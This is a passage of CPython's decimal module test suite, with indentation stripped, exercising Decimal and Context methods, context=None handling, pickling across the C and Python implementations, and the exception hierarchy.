self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
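# Swapping sys.modules['decimal'] makes pickle resolve the class by
# module name at load time, so a pickle produced by one implementation
# must load as the other implementation's Decimal.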
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
@cpython_only
def test_small_ints(self):
Decimal = self.decimal.Decimal
# bpo-46361: CPython interns small ints, so int() of an integral
# Decimal in that range must return the cached int object itself.
for x in range(-5, 257):
self.assertIs(int(Decimal(x)), x)
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
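# from_float converts the binary double exactly, so 0.1 expands to its
# full exact decimal value, asserted below.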
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
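# xc is deliberately tiny (prec=1, Emax=1, Emin=-1): results round to
# one digit and overflow easily, making it obvious whether the explicit
# context= argument is honoured while the thread-local context c stays
# untouched.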
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
